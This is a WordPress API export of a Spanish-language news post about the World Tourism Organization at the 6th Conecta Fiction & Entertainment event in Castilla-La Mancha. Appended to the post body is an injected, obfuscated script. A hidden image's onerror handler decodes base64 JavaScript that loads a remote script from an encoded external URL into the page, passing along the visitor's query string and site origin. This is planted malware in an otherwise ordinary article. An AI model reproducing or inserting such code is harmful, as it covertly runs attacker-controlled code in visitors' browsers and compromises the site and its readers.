{"id":5425,"date":"2022-06-23T20:05:24","date_gmt":"2022-06-23T23:05:24","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5425"},"modified":"2025-08-13T16:18:14","modified_gmt":"2025-08-13T19:18:14","slug":"la-omt-participa-en-la-6a-edicion-de-conecta-fiction-entertainment","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5425","title":{"rendered":"LA OMT PARTICIPA EN LA 6A EDICI\u00d3N DE CONECTA FICTION &amp; ENTERTAINMENT"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"72\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1024x72.jpeg\" alt=\"\" class=\"wp-image-5399\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1024x72.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-300x21.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-768x54.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-696x49.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1068x75.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_.jpeg 1187w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#013451\"><em>La Organizaci\u00f3n Mundial del Turismo presenta sus iniciativas en Turismo Audiovisual y su visi\u00f3n con respecto al futuro del sector. Con el apoyo de la Organizaci\u00f3n Mundial del Turismo, se inaugura la 6a edici\u00f3n de Conecta Fiction &amp; Entertainment, un evento sobre coproducci\u00f3n y networking de series y contenidos entretenimiento para televisi\u00f3n organizado por el Gobierno de la Comunidad Aut\u00f3noma de Castilla-La Mancha, Turismo Castilla-La Mancha y Castilla-La Mancha Film Commission.<\/em><\/h5>\n\n\n\n<p>El principal objetivo de Conecta Fiction &amp; Entertainment es potenciar la inversi\u00f3n y las producciones audiovisuales de alta calidad mediante el intercambio de buenas pr\u00e1cticas, proyectos innovadores y talleres de formaci\u00f3n con expertos del sector.<\/p>\n\n\n\n<p>Durante su sesi\u00f3n de apertura, Ion Vilcu, director Ejecutivo de los Miembros Afiliados de la OMT, ha afirmado: \u201cel turismo y la industria audiovisual tienen un v\u00ednculo natural\u201d. Los viajeros se conectan de forma directa con los entornos de la realizaci\u00f3n de pel\u00edculas y series televisivas, lo que confiere a estos lugares un valor adicional para apoyar el desarrollo sostenible del sector del turismo\u201d.<\/p>\n\n\n\n<p class=\"has-text-align-center has-vivid-purple-color has-text-color\"><strong><em>el turismo y la industria audiovisual tienen un v\u00ednculo natural<\/em><\/strong><\/p>\n\n\n\n<p>Por su parte, la consejera de Econom\u00eda, Negocios y Empleo del Gobierno de Castilla-La Mancha, Patricia Franco Jim\u00e9nez, ha resaltado la importancia de fortalecer el posicionamiento de la regi\u00f3n como destino atractivo para productoras internacionales. Adem\u00e1s, ha subrayado que \u00abel sector audiovisual nos ayuda a fortalecer los indicadores de turismo que tenemos en la regi\u00f3n, como por ejemplo el n\u00famero de empleados, que ha alcanzado las cifras m\u00e1s altas registradas, s\u00f3lo por detr\u00e1s de 2019\u00bb.<\/p>\n\n\n\n<p>Esta cita de relevancia internacional en la industria audiovisual cuenta con la participaci\u00f3n de entidades como Movistar, HBO Espa\u00f1a, RTVE, Netflix, Rai y Mediaset Espa\u00f1a.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.unwto.org\/es\/news\/la-omt-participa-en-la-6a-edicion-de-conecta-fiction-and-entertainment\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"89\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-1024x89.jpg\" alt=\"\" class=\"wp-image-4508\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-1024x89.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-300x26.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-768x67.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-1536x133.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-696x60.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-1068x93.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias.jpg 1568w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Organizaci\u00f3n Mundial del Turismo presenta sus iniciativas en Turismo Audiovisual y su visi\u00f3n con respecto al futuro del sector. Con el apoyo de la Organizaci\u00f3n Mundial del Turismo, se inaugura la 6a edici\u00f3n de Conecta Fiction &amp; Entertainment, un evento sobre coproducci\u00f3n y networking de series y contenidos entretenimiento para televisi\u00f3n organizado por el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5426,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-5425","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5425","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5425"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5425\/revisions"}],"predecessor-version":[{"id":10650,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5425\/revisions\/10650"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5426"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5425"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5425"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5425"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}